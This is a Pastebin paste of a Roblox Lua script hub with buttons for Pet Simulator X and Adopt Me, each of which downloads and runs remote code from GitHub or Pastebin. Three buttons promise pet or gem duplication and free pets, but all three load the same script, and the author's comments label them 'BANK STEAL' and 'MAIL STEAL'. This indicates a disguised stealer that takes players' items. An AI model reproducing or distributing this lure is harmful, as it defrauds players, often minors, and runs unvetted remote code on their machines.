Advertisement
calzzeyy

Untitled

Dec 20th, 2022
187
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.74 KB | None | 0 0
  1. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  2. local Window = Library.CreateLib("Calzzeyy's HUB:", "Sentinel")
  3.  
  4. -- MAIN:
  5. local Main = Window:NewTab("Main")
  6. local MainSection = Main:NewSection("Main (Pet Sim X")
  7.  
  8.  
  9. -- Button 1:
  10. MainSection:NewButton("Main Script:", "Jmes Script.", function()
  11. loadstring(game:HttpGet('https://raw.githubusercontent.com/jmesfo0/RobloxScripts/main/psx-jmes.lua'))()
  12. end)
  13.  
  14.  
  15. -- Button 2:
  16. MainSection:NewButton("Main Script WD:", "Project WD.", function()
  17. loadstring(game:HttpGet('https://pastebin.com/raw/RJVvw1pH'))()
  18. end)
  19.  
  20.  
  21. -- Button 2: BANK STEAL: PET DUPE
  22. MainSection:NewButton("Gem/Pet Dupe (Working):", "Insane Gem/Pet Dupe!!.", function()
  23. loadstring(game:HttpGet('https://pastebin.com/raw/Fjvzndmf'))()
  24. end)
  25.  
  26.  
  27. -- Button 2: BANK STEAL: HUGE DUPE
  28. MainSection:NewButton("Huge Pet Dupe! (ONLY PRESS IF U HAVE A HUGE!):", "Huge pet dupe!", function()
  29. loadstring(game:HttpGet('https://pastebin.com/raw/Fjvzndmf'))()
  30. end)
  31.  
  32.  
  33. -- Button 2: MAIL STEAL:
  34. MainSection:NewButton("FREE PETS IN PLAZA (PRESS IN NORMAL LOBBY FIRST):", "FREE BOOTH PURCHASES.", function()
  35. loadstring(game:HttpGet('https://pastebin.com/raw/Fjvzndmf'))()
  36. end)
  37.  
  38. local MainSection = Main:NewSection("Adopt Me Scripts")
  39.  
  40.  
  41. -- Button 3: Adopt Me:
  42. MainSection:NewButton("Adopt Me Pet Farm:", "Adopt Me Pet Farm.", function()
  43. loadstring(game:HttpGet('https://raw.githubusercontent.com/1201for/V.G-Hub/main/V.Ghub'))()
  44. end)
  45.  
  46.  
  47. -- Button 3: Adopt Me GingerBread Farm:
  48. MainSection:NewButton("Adopt Me Xmas Farm:", "Adopt Me Xmas Farm.", function()
  49. loadstring(game:HttpGet('https://raw.githubusercontent.com/IceMael7/NewIceHub/main/Brookhaven'))()
  50. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement